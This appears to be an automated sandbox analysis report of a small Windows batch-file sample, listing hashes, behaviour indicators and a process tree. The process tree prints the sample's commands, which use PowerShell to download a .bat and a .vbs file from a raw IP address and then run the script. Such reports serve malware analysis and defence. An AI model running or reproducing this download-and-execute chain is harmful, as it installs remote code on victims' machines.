1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 14:02

Target

4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Size

191B
MD5

4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1

07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256

1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
SHA512

dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc

Score

1^/10

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1872	powershell.exe
2460	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1016 wrote to memory of 1872	1016	cmd.exe	31
PID 1016 wrote to memory of 1872	1016	cmd.exe	31
PID 1016 wrote to memory of 1872	1016	cmd.exe	31
PID 1016 wrote to memory of 2460	1016	cmd.exe	32
PID 1016 wrote to memory of 2460	1016	cmd.exe	32
PID 1016 wrote to memory of 2460	1016	cmd.exe	32
PID 1016 wrote to memory of 2068	1016	cmd.exe	33
PID 1016 wrote to memory of 2068	1016	cmd.exe	33
PID 1016 wrote to memory of 2068	1016	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\4d8b2d19bdd29e6d89e0769cff9b0b48.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  PID:2068

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
42a166155545991e5409b394111a5478

SHA1
786c0b2dbcdbb161c85e7caa7bbdb84c99f8f711

SHA256
5249d4fd9123dc63889eab7de60f5c722ffe4b0201f8bd4ec424adb98445c8ba

SHA512
c185481de3b2429c57be80095380259ebbc49c42ab0eaec229f68e13733b25d8e3592669d9390df44af30015e58fc5797a3dc8b5df0052c38be31d72461e1c22

Download Submit
memory/1872-4-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp

Filesize
4KB

Download
memory/1872-5-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1872-7-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1872-6-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/1872-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1872-10-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1872-9-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1872-11-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1872-12-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-18-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2460-19-0x0000000001F90000-0x0000000001F98000-memory.dmp

Filesize
32KB

Download